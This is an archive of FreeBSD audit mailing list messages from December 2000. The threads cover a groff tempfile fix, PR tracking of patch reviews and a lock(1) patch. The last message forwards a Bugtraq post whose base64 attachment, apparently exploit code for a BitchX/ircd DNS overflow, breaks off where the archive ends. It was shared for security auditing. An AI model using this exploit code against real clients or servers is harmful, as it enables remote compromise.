Return-Path: Delivered-To: freebsd-audit@freebsd.org Received: from citusc17.usc.edu (citusc17.usc.edu [128.125.38.177]) by hub.freebsd.org (Postfix) with ESMTP id 4393937B400; Wed, 6 Dec 2000 18:29:36 -0800 (PST) Received: (from kris@localhost) by citusc17.usc.edu (8.11.1/8.11.1) id eB72VGP03775; Wed, 6 Dec 2000 18:31:16 -0800 (PST) (envelope-from kris) Date: Wed, 6 Dec 2000 18:31:16 -0800 From: Kris Kennaway To: Alexey Zelkin Cc: audit@FreeBSD.org Subject: Re: [kris@FreeBSD.ORG: Tempfiles and groff] Message-ID: <20001206183116.B3503@citusc17.usc.edu> References: <20001122034500.A6237@citusc17.usc.edu> <20001206165231.A99189@ark.cris.net> Mime-Version: 1.0 Content-Type: multipart/signed; micalg=pgp-md5; protocol="application/pgp-signature"; boundary="EuxKj2iCbKjpUGkD" Content-Disposition: inline User-Agent: Mutt/1.2.5i In-Reply-To: <20001206165231.A99189@ark.cris.net>; from phantom@FreeBSD.org on Wed, Dec 06, 2000 at 04:52:31PM +0200 Sender: kris@citusc17.usc.edu Sender: owner-freebsd-audit@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.ORG --EuxKj2iCbKjpUGkD Content-Type: text/plain; charset=us-ascii Content-Disposition: inline Content-Transfer-Encoding: quoted-printable On Wed, Dec 06, 2000 at 04:52:31PM +0200, Alexey Zelkin wrote: > hi, >=20 > Fixed by 1.61.1 import. Excellent, thanks! Kris >=20 > On Wed, Nov 22, 2000 at 03:45:00AM -0800, Kris Kennaway wrote: > > Any ideas? > >=20 > > Kris > >=20 > > ----- Forwarded message from Kris Kennaway ----- > >=20 > > Delivered-To: kris@freebsd.org > > Delivered-To: freebsd-audit@freebsd.org > > Date: Sun, 19 Nov 2000 16:17:06 -0800 > > From: Kris Kennaway > > To: audit@FreeBSD.ORG > > Subject: Tempfiles and groff > > User-Agent: Mutt/1.2.5i > > X-Loop: FreeBSD.ORG > > Precedence: bulk > >=20 > > Any groff experts in the house? > >=20 > > I want to fix the following ugliness in=20 > > /usr/src/contrib/groff/tmac/tmac.pspic which is apparently called > > during make world, and possibly at other times. > >=20 > > .sy echo .ps-bb `psbb \\$1` >/tmp/psbb\\n[$$] > > .so /tmp/psbb\\n[$$] > > .sy rm /tmp/psbb\\n[$$] > >=20 > > We need to set a variable to contain the tempfile name generated with > > mktemp and refer to that in the later lines. I have no idea how to do > > this (or even what .so does :-) > >=20 > > Kris > >=20 > >=20 > >=20 > > ----- End forwarded message ----- >=20 >=20 >=20 > --=20 > /* Alexey Zelkin && phantom@cris.net */ > /* Tavric National University && phantom@FreeBSD.org */ > /* Sysadmin/Developer && phantom@sms.umc.com.ua */ --EuxKj2iCbKjpUGkD Content-Type: application/pgp-signature Content-Disposition: inline -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.0.4 (FreeBSD) Comment: For info see http://www.gnupg.org iEYEARECAAYFAjou9nQACgkQWry0BWjoQKXRXQCfZ/C8h/7aDmSWSrKfSPPfk8Lq q/YAoKP09DLoHcS1ftijHAmvHjZGYh/D =lNFi -----END PGP SIGNATURE----- --EuxKj2iCbKjpUGkD-- To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-audit" in the body of the message From owner-freebsd-audit Thu Dec 7 4:42: 1 2000 From owner-freebsd-audit@FreeBSD.ORG Thu Dec 7 04:41:59 2000 Return-Path: Delivered-To: freebsd-audit@freebsd.org Received: from lists01.iafrica.com (lists01.iafrica.com [196.7.0.141]) by hub.freebsd.org (Postfix) with ESMTP id BDE1437B401 for ; Thu, 7 Dec 2000 04:41:57 -0800 (PST) Received: from nwl.fw.uunet.co.za ([196.31.2.162]) by lists01.iafrica.com with esmtp (Exim 3.12 #2) id 1440My-0006Di-00; Thu, 07 Dec 2000 14:41:52 +0200 Received: (from nobody@localhost) by nwl.fw.uunet.co.za (8.8.8/8.6.9) id OAA09284; Thu, 7 Dec 2000 14:41:48 +0200 (SAST) Received: by nwl.fw.uunet.co.za via recvmail id 9246; Thu Dec 7 14:41:14 2000 Received: from sheldonh (helo=axl.fw.uunet.co.za) by axl.fw.uunet.co.za with local-esmtp (Exim 3.16 #1) id 1440MM-00013a-00; Thu, 07 Dec 2000 14:41:14 +0200 From: Sheldon Hearn To: Mike Heffner Cc: Warner Losh , audit@freebsd.org Subject: Re: PR suggestion In-reply-to: Your message of "Mon, 04 Dec 2000 16:29:38 EST." Date: Thu, 07 Dec 2000 14:41:14 +0200 Message-ID: <4065.976192874@axl.fw.uunet.co.za> Sender: owner-freebsd-audit@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.ORG On Mon, 04 Dec 2000 16:29:38 EST, Mike Heffner wrote: > I'm all for it. Hopefully it'll mean more follow through on patches. Should > there be a new category added, for example "audit"? I'm not wild about the new category idea. I'd suggest 1) Put [AUDIT] on the Synopsis line instead of [PATCH] as usual. 2) Assign the PR to audit, not audit@FreeBSD.org... We don't use qualified e-mail addresses in our PR assignments. Ciao, Sheldon. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-audit" in the body of the message From owner-freebsd-audit Thu Dec 7 7:34:30 2000 From owner-freebsd-audit@FreeBSD.ORG Thu Dec 7 07:34:28 2000 Return-Path: Delivered-To: freebsd-audit@freebsd.org Received: from innocence.interface-business.de (innocence.interface-business.de [193.101.57.202]) by hub.freebsd.org (Postfix) with ESMTP id DB64537B401 for ; Thu, 7 Dec 2000 07:34:26 -0800 (PST) Received: from interface-business.de (uucp@localhost) by innocence.interface-business.de with UUCP id QAA36715 for audit@FreeBSD.org; Thu, 7 Dec 2000 16:34:25 +0100 (CET) Received: (from j@localhost) by B7173150.deutschepost.de id QAA14455 for audit@FreeBSD.org; Thu, 7 Dec 2000 16:33:33 +0100 (CET) Date: Thu, 7 Dec 2000 16:33:33 +0100 From: J Wunsch To: audit@FreeBSD.org Subject: [j@ida.interface-business.de: Re: Please review a change to lock(1)] Message-ID: <20001207163333.A14418@B7173150.DeutschePost.de> Reply-To: Joerg Wunsch Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii X-Mailer: Mutt 0.95.4i X-Phone: +49-351-31809-14 X-PGP-Fingerprint: DC 47 E6 E4 FF A6 E9 8F 93 21 E0 7D F9 12 D6 4E Organization: interface business GmbH, Dresden Sender: j@interface-business.de Sender: owner-freebsd-audit@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.ORG Kris pointed out to me that i should have sent this to the audit list. Sorry, right now i've sent it to -security, so here it is, just FYI. ----- Forwarded message from J Wunsch ----- Date: Thu, 7 Dec 2000 15:57:50 +0100 From: J Wunsch To: freebsd-security@freebsd.org Subject: Re: Please review a change to lock(1) Message-ID: <20001207155750.E4709@B7173150.DeutschePost.de> Reply-To: Joerg Wunsch References: <20001207115835.V4709@B7173150.DeutschePost.de> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii X-Mailer: Mutt 0.95.4i In-Reply-To: ; from James Wyatt on Thu, Dec 07, 2000 at 08:29:03AM -0600 X-Phone: +49-351-31809-14 X-PGP-Fingerprint: DC 47 E6 E4 FF A6 E9 8F 93 21 E0 7D F9 12 D6 4E Organization: interface business GmbH, Dresden Status: RO Content-Length: 1449 Lines: 49 As James Wyatt wrote: > Maybe you could see if it's PPID becomes 1 as init inherits it as an > orphan from the dead parent process. I would *definately* syslog the error > as a simple error *could* be an attempt to trick lock. Some programs > deserve paranoia due to their use and level of users' blind trust. - Jy@ OK, point taken, new suggestion. (Btw., please leave me in the Cc list when replying, i'm not subscribed to -security.) Index: lock.c =================================================================== RCS file: /home/ncvs/src/usr.bin/lock/lock.c,v retrieving revision 1.8 diff -u -r1.8 lock.c --- lock.c 1999/10/12 13:53:30 1.8 +++ lock.c 2000/12/07 14:54:48 @@ -61,6 +61,7 @@ #include #include #include +#include #include #include #include @@ -189,7 +190,15 @@ for (;;) { (void)printf("Key: "); + errno = 0; if (!fgets(s, sizeof(s), stdin)) { + if (errno == EIO && getppid() == 1) { + /* Our terminal is gone; good-bye. */ + syslog(LOG_NOTICE, + "exiting due to IO error on terminal (UID %d@%s on %s)", + getuid(), ttynam, hostname); + exit(1); + } clearerr(stdin); hi(); continue; -- Joerg Wunsch NIC hdl: JW11-RIPE On the air: DL8DTL See http://www.interface-business.de/~j/ for more information. Some addresses in the headers might be wrong (sorry - I'm not the admin here). ----- End forwarded message ----- -- Joerg Wunsch NIC hdl: JW11-RIPE On the air: DL8DTL See http://www.interface-business.de/~j/ for more information. Some addresses in the headers might be wrong (sorry - I'm not the admin here). To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-audit" in the body of the message From owner-freebsd-audit Thu Dec 7 20:42:22 2000 From owner-freebsd-audit@FreeBSD.ORG Thu Dec 7 20:42:21 2000 Return-Path: Delivered-To: freebsd-audit@freebsd.org Received: from citusc.usc.edu (citusc.usc.edu [128.125.38.123]) by hub.freebsd.org (Postfix) with ESMTP id A586537B400 for ; Thu, 7 Dec 2000 20:42:17 -0800 (PST) Received: (from kris@localhost) by citusc.usc.edu (8.9.3/8.9.3) id UAA28706; Thu, 7 Dec 2000 20:43:34 -0800 Date: Thu, 7 Dec 2000 20:43:34 -0800 From: kris@citusc.usc.edu To: Warner Losh Cc: audit@FreeBSD.ORG Subject: Re: PR suggestion Message-ID: <20001207204334.C28596@citusc.usc.edu> References: <200012042009.NAA63339@harmony.village.org> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline User-Agent: Mutt/1.2i In-Reply-To: <200012042009.NAA63339@harmony.village.org>; from imp@village.org on Mon, Dec 04, 2000 at 01:09:12PM -0700 Sender: owner-freebsd-audit@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.ORG On Mon, Dec 04, 2000 at 01:09:12PM -0700, Warner Losh wrote: > I fear that we're going to start dropping these things on the floor. > I'd like to propose that we use the PR system to our advantage. We > should assign pending patch reviews to audit@freebsd.org. when things > are fixed, we'd get mail. We'd get a weekly summary of the open > issues and some of the discussions about the patches would be recorded > in the PR. > > Comments? Good idea. Personally I don't delete mail from this folder and leave it marked "important" if I've read it but know it is unresolved and need to get back to it. This is a more scalable and communal solution. Kris To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-audit" in the body of the message From owner-freebsd-audit Thu Dec 7 22:34:46 2000 From owner-freebsd-audit@FreeBSD.ORG Thu Dec 7 22:34:37 2000 Return-Path: Delivered-To: freebsd-audit@freebsd.org Received: from silby.com (cb34181-c.mdsn1.wi.home.com [24.183.3.139]) by hub.freebsd.org (Postfix) with ESMTP id CF74D37B400 for ; Thu, 7 Dec 2000 22:34:36 -0800 (PST) Received: (qmail 22991 invoked by uid 1000); 8 Dec 2000 06:34:35 -0000 Received: from localhost (sendmail-bs@127.0.0.1) by localhost with SMTP; 8 Dec 2000 06:34:35 -0000 Date: Fri, 8 Dec 2000 00:34:35 -0600 (CST) From: Mike Silbersack To: freebsd-audit@freebsd.org Subject: bitchx/ircd DNS overflow demonstration (fwd) Message-ID: MIME-Version: 1.0 Content-Type: MULTIPART/Mixed; BOUNDARY=1BoxPartBoundary97620769315457976207693 Content-ID: Sender: owner-freebsd-audit@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.ORG This message is in MIME format. The first part should be readable text, while the remaining parts are likely unreadable without MIME-aware tools. Send mail to mime@docserver.cac.washington.edu for more info. --1BoxPartBoundary97620769315457976207693 Content-Type: TEXT/PLAIN; CHARSET=US-ASCII Content-ID: Content-Disposition: INLINE Since people appear to be on an auditing rampage, I thought I'd forward this over to the list. It describes some DNS parsing bugs in a few ircds and BitchX that seem to have serious consequences. It may be worth a look into if programs in the base system have similar problems. Mike "Silby" Silbersack ---------- Forwarded message ---------- Date: Thu, 7 Dec 2000 08:48:13 -0800 From: nimrood To: BUGTRAQ@SECURITYFOCUS.COM Subject: bitchx/ircd DNS overflow demonstration code is attached. __________________________________________________ FREE voicemail, email, and fax...all in one place. Sign Up Now! http://www.onebox.com --1BoxPartBoundary97620769315457976207693 Content-Type: APPLICATION/OCTET-STREAM; CHARSET=us-ascii Content-Transfer-Encoding: BASE64 Content-ID: Content-Description: Content-Disposition: ATTACHMENT; FILENAME="helot.c" LyoKICogaGVsb3QuYyAtIGJpdGNoeC9pcmNkIEROUyBvdmVyZmxvdyBkZW1vbnN0cmF0aW9u CiAqIHcwMHcwMCBTZWN1cml0eSBEZXZlbG9wbWVudCAoV1NEKQogKiAxMi4wNC4yMDAwIG5p bXJvb2QgKG5pbXJvb2RAb25lYm94LmNvbSkKICoKICogdGhpcyBzYW1lIGNvZGUgaSB1c2Vk IHRvIGV4cGxvaXQgYW4gaXJjZCBETlMgc3Bvb2ZpbmcgYnVnCiAqIGZyb20gZWFybHkgJzk5 LiByZS11c2FibGUgY29kZSBpcyBncmVhdC4KICogdGhpcyBwcm9ncmFtIGlzIGZ1biB0byBw bGF5IHdpdGggaWYgeW91J3JlIG1lc3Npbmcgd2l0aCBETlMuCiAqIHRoZSBwYWNrZXQgYnVp bGRlciBpcyBNYWtlRE5TUGt0KCkuIHRoaXMgdG9vbCBjb21waWxlcyBvbiBteQogKiBsaW51 eCBzeXN0ZW1zIHdpdGggbm8gcHJvYmxlbXMuCiAqCiAqIAlHcmVldGluZ3MgOjogIyF3MDB3 MDAsIGNhZGRpcywgZG1lc3Mwciwgbm9jYXJyaWVyLCBueXQsCiAqICAgICAgICAgICAgICAg ICAgIHN1cGVybHVjaywgam9iZSwgYXdyLCBtZXRhYm9saXMsIHNxLCBiYjB5CiAqCiAqIC0t LS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0KICogcHJvYmxlbSAxOiAtLT4gZ2Vu ZXJpYyBpcmNkCiAqIGN1cnJlbnQgYW5kIG9sZGVyIGlyYyBzZXJ2ZXJzIHN1ZmZlciBmcm9t IGEgY29tbW9uIGJ1Zy4KICogYSBwb2ludGVyIGlzIG5vdCB1cGRhdGVkIGNvcnJlY3RseSB3 aGVuIGhhbmRsaW5nIHVuc3VwcG9ydGVkCiAqIFJSIHR5cGVzIChlZzogVF9OVUxMKS4gdGhp cyBtYWtlcyB0aGUgc2VydmVyIHRoaW5rCiAqIGl0IHJlY2VpdmVkIGEgbWFsZm9ybWVkIHBh Y2tldCB3aGVuIHRyeWluZyB0byBwcm9jZXNzIHRoZSBuZXh0IFJSLgogKiBpdCdzIG5vdCBh IHJlYWxseSBzZXJpb3VzIGJ1ZywgYnV0IGl0IGFsbG93cyBmb3IgYSBuZWF0IHRyaWNrOgog KgogKiB5b3UgY2FuIGVtYmVkIGFueSBSUiB0eXBlIGluIGFuIHVuc3VwcG9ydGVkIFJSIChl ZzogVF9OVUxMKS4gdGhlc2UKICogZW1iZWRkZWQgUlIncyBhcmUgbm90IGNoZWNrZWQgZm9y IGVycm9ycyBvciBkcm9wcGVkIGJ5IG5hbWVzZXJ2ZXJzLi4uCiAqIAogKiBwcm9ibGVtIDI6 IC0tPiBiaXRjaHggYWxsIHZlcnNpb25zLCByZW1vdGUgY29kZSBleGNlY3V0aW9uCiAqIGJp dGNoeCBhcHBlYXJzIHRvIHVzZSBjb2RlIGZyb20gb2xkZXIgaXJjIHNlcnZlcnMgdG8gcGVy Zm9ybSBkbnMKICogbG9va3Vwcy4gdGhpcyBvbGQgY29kZSBzdWZmZXJzIGZyb20gYSBiY29w eS9tZW1jcHkgb3ZlcmZsb3cgd2hpbGUKICogcHJvY2Vzc2luZyBUX0EgUlIncy4gVGhlIFRf QSBSUiBkYXRhIGxlbmd0aCBpcyB1c2VkIGluIGEgc3Vic2VxdWVudAogKiBtZW1jcHkgd2l0 aG91dCBib3VuZHMgY2hlY2tpbmcuIHRoZSBvdmVyZmxvd2VkIHZhcmlhYmxlIHN0b3JlcyBh bgogKiBJUCBhZGRyZXNzLCBvbmx5IDQgYnl0ZXMgbG9uZy4gdGhpcyBpcyBzaW1pbGFyIHRv IHRoZSBJX1FVRVJZIEJJTkQKICogb3ZlcmZsb3cuIGJpdGNoeCBkbnMgYWxzbyBzdWZmZXJz IGZyb20gcHJvYmxlbSAxLgogKgogKiBmcm9tIGJpdGNoeC0xLjBjMTcsIC4vc291cmNlL21p c2MuYyA6IGFyX3Byb2NhbnN3ZXIoKQogKiBsaW5lIDI2Mzk6CiAqICAgICAgICAgICBkbGVu ID0gIChpbnQpX2dldHNob3J0KGNwKTsKICogICAgICAgICAgIGNwICs9IHNpemVvZihzaG9y dCk7CiAqICAgICAgICAgICBycHRyLT5yZV90eXBlID0gdHlwZTsKICogCiAqICAgICAgICAg ICBzd2l0Y2godHlwZSkKICogICAgICAgICAgIHsKICogICAgICAgICAgIGNhc2UgVF9BIDoK ICogICAgICAgICAgICAgICAgICAgcnB0ci0+cmVfaGUuaF9sZW5ndGggPSBkbGVuOwogKiAg ICAgICAgICAgICAgICAgICBpZiAoYW5zID09IDEpCiAqICAgICAgICAgICAgICAgICAgICAg ICAgICAgcnB0ci0+cmVfaGUuaF9hZGRydHlwZT0oY2xhc3MgPT0gQ19JTikgPyBBRl9JTkVU IDogQUZfVU5TUEVDOwogKiAgICAgICAgICAgICAgICAgICBtZW1jcHkoJmRyLCBjcCwgZGxl bik7CiAqCiAqIHByb2JsZW0gMzogLS0+IGNvbXN0dWQgaXJjZCwgcmVtb3RlIGNvZGUgZXhl Y3V0aW9uCiAqIGZ1bm55IGVub3VnaCwgd2hpbGUgd29ya2luZyBvbiB0aGUgYml0Y2h4IG92 ZXJmbG93LCBpIGFjY2lkZW50YWxseQogKiBjb25uZWN0ZWQgYSBjbGllbnQgdXNpbmcgdGhl IHdyb25nIElQIHRvIGEgY29tc3R1ZCBpcmNkLi4uaXQgZGllZC4KICogaSBmb3VuZCBjb21z dHVkLTEueCByZWxlYXNlcyBhcmUgbm90IHZ1bG5lcmFibGUuIAogKiBpIHN1c3BlY3Qgb3Ro ZXIgaXJjZCBzZXJ2ZXIgdmFyaWVudHMgd2lsbCBiZSB2dWxuZXJhYmxlLiBpIHdvdWxkCiAq IHJlY29tbWVuZCB1cGdyYWRpbmcgdG8gYSBjb21zdHVkLTEueCByZWxlYXNlLiBoeWJyaWQt aXJjZCB0ZWFtIGZpeGVkCiAqIHRoaXMgYnVnIGEgd2hpbGUgYmFjayB3aXRoIHRoZSByZWxl YXNlIG9mIGh5YnJpZC01LjNwMy4KICoKICogZnJvbSBpcmMyLjguMjErQ1NyMzFwbDIsIC4v c291cmNlL3Jlcy5jIDogcHJvY19hbnN3ZXIoKQogKiBsaW5lIDU0ODoKICogICAgICAgICAg ZGxlbiA9ICAoaW50KV9nZXRzaG9ydCgodV9jaGFyICopY3ApOwogKiBsaW5lIDU2NToKICog ICAgICAgICAgc3dpdGNoKHR5cGUpCiAqICAgICAgICAgIHsKICogICAgICAgICAgY2FzZSBU X0EgOgogKiAgICAgICAgICAgICAgICAgIGhwLT5oX2xlbmd0aCA9IGRsZW47CiAqICAgICAg ICAgICAgICAgICAgaWYgKGFucyA9PSAxKQogKiAgICAgICAgICAgICAgICAgICAgICAgICAg aHAtPmhfYWRkcnR5cGUgPSAgKGNsYXNzID09IENfSU4pID8gQUZfSU5FVCA6IEFGX1VOU1BF QzsKICogICAgICAgICAgICAgICAgICBiY29weShjcCwgKGNoYXIgKikmZHIsIGRsZW4pOwog KgogKiB0aGVyZSBhcmUgbm8gYmFkIGd1eXMuLi4ganVzdCBkaXN0dXJiZWQgZ3V5cy4KICov CgojaW5jbHVkZSA8c3RkaW8uaD4KI2luY2x1ZGUgPHN0ZGxpYi5oPgojaW5jbHVkZSA8dW5p c3RkLmg+CiNpbmNsdWRlIDxzdHJpbmcuaD4KI2luY2x1ZGUgPHN5cy90aW1lLmg+CiNpbmNs dWRlIDxzeXMvdHlwZXMuaD4KI2luY2x1ZGUgPHN5cy9zb2NrZXQuaD4KI2luY2x1ZGUgPHNp Z25hbC5oPgojaW5jbHVkZSA8bmV0aW5ldC9pbi5oPgojaW5jbHVkZSA8YXJwYS9uYW1lc2Vy Lmg+CiNpbmNsdWRlIDxhcnBhL2luZXQuaD4KCi8qIGZvciB3aGF0ZXZlciByZWFzb24sIHRo ZXNlIG1heSBuZWVkIHRvIGJlIGRlZmluZWQgKi8KI2lmbmRlZiB1X2NoYXIKI2RlZmluZSB1 X2NoYXIgdW5zaWduZWQgY2hhcgojZW5kaWYKI2lmbmRlZiB1X3Nob3J0CiNkZWZpbmUgdV9z aG9ydCB1bnNpZ25lZCBzaG9ydAojZW5kaWYKI2lmbmRlZiB1X2xvbmcKI2RlZmluZSB1X2xv bmcgdW5zaWduZWQgbG9uZwojZW5kaWYKCiNkZWZpbmUgRE5TX1BPUlQgNTMKCmV4dGVybiBp bnQgb3B0aW5kLCBvcHRvcHQ7CmV4dGVybiBjaGFyICpvcHRhcmc7CgovKiB1c2VkIGZvciBj b252ZXJ0aW5nIHF1ZXJ5IHR5cGUgaW50ZWdlciB0byByZXNwZWN0aXZlIHN0cmluZyAqLwpz dHJ1Y3QgcXR5cGVfbGlzdAp7CglpbnQgdHlwZTsKCWNoYXIgKm5hbWU7Cn07CmNvbnN0IHN0 cnVjdCBxdHlwZV9saXN0IHF0eXBlbGlzdFtdID0KewoJe1RfQSwJCSJBIn0sCgl7VF9OUywJ CSJOUyJ9LAoJe1RfQ05BTUUsCSJDTkFNRSJ9LAoJe1RfU09BLAkJIlNPQSJ9LAoJe1RfUFRS LAkJIlBUUiJ9LAoJe1RfSElORk8sCSJISU5GTyJ9LAoJe1RfTVgsCQkiTVgifSwKCXtUX0FO WSwJCSJBTlkifSwKCXtUX05VTEwsCSJOVUxMIn0sCgl7VF9XS1MsCQkiV0tTIn0sCgl7MCwJ CSIodW5rbm93bikifQp9OwoKdm9pZCBDYXRjaFNpZ0ludChpbnQgc2lnKQp7CglzaWduYWwo U0lHSU5ULCBTSUdfREZMKTsKfQoKdm9pZCBVc2FnZShjaGFyICpwcm9nKQp7CglmcHJpbnRm KHN0ZGVyciwgIlwKdXNhZ2U6ICVzIFstayBwaWRdIFstdCB0dGxdIFstYiBpcF0gaXAgaG9z dG5hbWVcblwKICBpcCAgICAgICAgICAgaXAgYWRkcmVzcyB0byBhbnN3ZXIgcmV2ZXJzZSBs b29rdXBzIGZvclxuXAogIGhvc3RuYW1lICAgICBob3N0bmFtZSB0byBiZSBtYXBwZWQgdG8g aXAsIGFuZCBhbnN3ZXIgZm9yd2FyZCBsb29rdXBzXG5cCiAgLWsgICAgICAgICAgIGtpbGwg dGhpcyBwcm9jZXNzIGJlZm9yZSBiaW5kaW5nIGRucyBwb3J0XG5cCiAgLXQgICAgICAgICAg IGNhY2hlIHRpbWUtdG8tbGl2ZSAoc2Vjb25kcykgZm9yIHRoaXMgYW5zd2VyIChkZWZhdWx0 OiA5MDApXG5cCiAgLWIgICAgICAgICAgIGJpbmQgdGhlIG5hbWVzZXJ2ZXIgdG8gdGhpcyBh ZGRyZXNzIChkZWZhdWx0LCBhbGwgYWRkcmVzc2VzKVxuIiwKCXByb2cpOwoJZXhpdCgxKTsK fQoKY2hhciAqaXAySW5BZGRyU3RyKHVfbG9uZyBpcCkKewoJc3RhdGljIGNoYXIgKnN0cjsK CXVfY2hhciAqYnl0ZTsKCglpZighc3RyKSAKCXsKCQlpZigoc3RyPW1hbGxvYyhNQVhMQUJF TCkpID09IE5VTEwpCgkJCXJldHVybihzdHIpOwoJfQoKCS8qIElQIHNob3VsZCBiZSBpbiBu ZXR3b3JrIG9yZGVyIHRvIGdlbmVyYXRlIGEgcHJvcGVyIGluLWFkZHIgKi8JCglieXRlID0g KHVfY2hhciAqKSZpcDsKCXNwcmludGYoc3RyLCAiJWQuJWQuJWQuJWQuSU4tQUREUi5BUlBB LiIsIGJ5dGVbM10sIGJ5dGVbMl0sIGJ5dGVbMV0sCgkJYnl0ZVswXSk7CgoJcmV0dXJuKHN0 cik7Cn0KCnVfc2hvcnQgRXhwYW5kRE5hbWUoY2hhciAqY29tcCwgY2hhciAqZGVzdCwgdV9z aG9ydCBsZW4pCnsKICAgICAgICBjaGFyICpjcCwgKmNwMjsKICAgICAgICB1X3Nob3J0IG51 bTsKCiAgICAgICAgY3AgPSBjb21wOyBjcDIgPSBkZXN0OwogICAgICAgIGlmKHN0cmNocihj cCwgJy4nKSAmJiBzdHJsZW4oY3ApIDwgbGVuKQogICAgICAgIHsKICAgICAgICAgICAgICAg IHN0cmNweShjcDIsIGNwKTsKICAgICAgICAgICAgICAgIGlmKCooY3AyICsgc3RybGVuKGNw MikpICE9ICcuJykKICAgICAgICAgICAgICAgICAgICAgICAgc3RyY2F0KGNwMiwgIi4iKTsK ICAgICAgICAgICAgICAgIHJldHVybihzdHJsZW4oY3AyKSk7CiAgICAgICAgfQoKICAgICAg ICB3aGlsZSgoKmNwKSAmJiAoY3ApKQogICAgICAgIHsKICAgICAgICAgICAgICAgIG51bSA9 ICh1X2NoYXIpKmNwOwogICAgICAgICAgICAgICAgaWYobnVtICsgKGNwMiAtIGRlc3QpID4g bGVuKQogICAgICAgICAgICAgICAgICAgICAgICBicmVhazsKICAgICAgICAgICAgICAgIG1l bWNweShjcDIsICsrY3AsIG51bSk7CiAgICAgICAgICAgICAgICBjcCArPSBudW07IGNwMiAr PSBudW07CiAgICAgICAgICAgICAgICAqKGNwMisrKSA9ICcuJzsKICAgICAgICB9CiAgICAg ICAgKmNwMiA9IDA7CiAgICAgICAgcmV0dXJuKGNwMiAtIGRlc3QpOwp9CgppbnQgQ29tcERO YW1lKGNoYXIgKmJ1ZiwgY2hhciAqZG5hbWUpCnsKCWNoYXIgKnAgPSBidWYsICpwMTsKCgl3 aGlsZSgoKmRuYW1lKSAmJiAoZG5hbWUpKQoJewoJCWlmKCgqZG5hbWUgPT0gJy4nKSAmJiAo ISooZG5hbWUgKyAxKSkpCgkJCWJyZWFrOwoJCXAxID0gc3RyY2hyKGRuYW1lLCAnLicpOwoJ CWlmKCFwMSkKCQkJcDEgPSBzdHJjaHIoZG5hbWUsIDApOwoJCSoocCsrKSA9IHAxIC0gZG5h bWU7CgkJbWVtY3B5KHAsIGRuYW1lLCBwMSAtIGRuYW1lKTsKCQlwICs9IHAxIC0gZG5hbWU7 CgkJZG5hbWUgPSBwMTsKCQlpZigqcDEpCgkJCWRuYW1lKys7Cgl9CgkqKHArKykgPSAwOwoJ cmV0dXJuKHAgLSBidWYpOwp9CgovKgogKiBQcm9jRE5TUGt0KCkKICoKICogZGVzYzogcHJv Y2VzcyBhIHBhY2tldCwgcmV0dXJuIHF1ZXJ5IG5hbWUgSUYgaXQncyBhIHF1ZXN0aW9uCiAq IGlucHV0OiBwb2ludGVyIHRvIHBhY2tldCBidWZmZXIsIHBhY2tldCBidWZmZXIgbGVuZ3Ro CiAqIG91dHB1dDogcG9pbnRlciB0byBxdWVyeSBuYW1lIHN0cmluZywgb3IgTlVMTCwgdHlw ZSBvZiBxdWVyeSAKICovCmNoYXIgKlByb2NETlNQa3QoY2hhciAqcGt0LCB1X3Nob3J0IHBr dGxlbiwgaW50ICpxdHlwZSkKewoJc3RhdGljIGNoYXIgKnFuYW1lOwoJY2hhciAqcVJSOwoJ SEVBREVSICpkbnNoZHI7CglpbnQgcW5hbWVsZW47CgoJLyogZG8gd2UgZXZlbiBoYXZlIHNv bWV0aGluZyB0byBsb29rIGF0PyAqLwoJaWYocGt0ID09IE5VTEwgfHwgcGt0bGVuIDwgKEhG SVhFRFNaICsgUUZJWEVEU1opKQoJCXJldHVybigwKTsKCWRuc2hkciA9IChIRUFERVIgKilw a3Q7CgoJLyogY2hlY2sgcXVlcnkgcmVzcG9uc2UgZmxhZyAqLwoJaWYoZG5zaGRyLT5xcikK CQlyZXR1cm4oMCk7CgoJLyogY2hlY2sgdGhhdCB3ZSBoYXZlIG9ubHkgYSBxdWVzdGlvbiBp biB0aGlzIHBhY2tldCAqLwoJaWYobnRvaHMoZG5zaGRyLT5xZGNvdW50KSAhPSAxIHx8IG50 b2hzKGRuc2hkci0+YXJjb3VudCkgIT0gMCB8fAoJCW50b2hzKGRuc2hkci0+bnNjb3VudCkg IT0gMCB8fCBudG9ocyhkbnNoZHItPmFyY291bnQpICE9IDApCgkJcmV0dXJuKDApOwoKCWlm KCFxbmFtZSkKCXsKCQlpZigocW5hbWUgPSBtYWxsb2MoTUFYRE5BTUUpKSA9PSAwKQoJCXsK CQkJZnByaW50ZihzdGRlcnIsICJubyBtZW1vcnkgZm9yIHFuYW1lXG4iKTsKCQkJcmV0dXJu KDApOwoJCX0KCX0KCXFuYW1lbGVuID0gRXhwYW5kRE5hbWUocGt0K0hGSVhFRFNaLCBxbmFt ZSwgTUFYRE5BTUUpOwoJaWYocW5hbWVsZW4gPT0gMCkKCQlyZXR1cm4oTlVMTCk7CgoJLyog ZXh0cmFjdCB0aGUgcXVlcnkgdHlwZSByZWNlaXZlZCBhbmQgZmlsbCBpbiBxdHlwZSAqLwoJ cVJSID0gcGt0ICsgSEZJWEVEU1ogKyBzdHJsZW4ocGt0ICsgSEZJWEVEU1opICsgMTsKCUdF VFNIT1JUKHFuYW1lbGVuLCBxUlIpOyAKCSpxdHlwZSA9IHFuYW1lbGVuOwoJcmV0dXJuKHFu YW1lKTsKfQoKLyoKICogUVR5cGUyU3RyKCkKICoKICogZGVzYzogY29udmVydCBxdWVyeSB0 eXBlIGludGVnZXIgdG8gYSBzdHJpbmcgcmVwcmVzZW50YXRpb24KICogaW5wdXQ6IHF1ZXJ5 IHR5cGUKICogb3V0cHV0OiBwb2ludGVyIHRvIHN0cmluZyBvZiBxdWVyeSB0eXBlCiAqLwpj 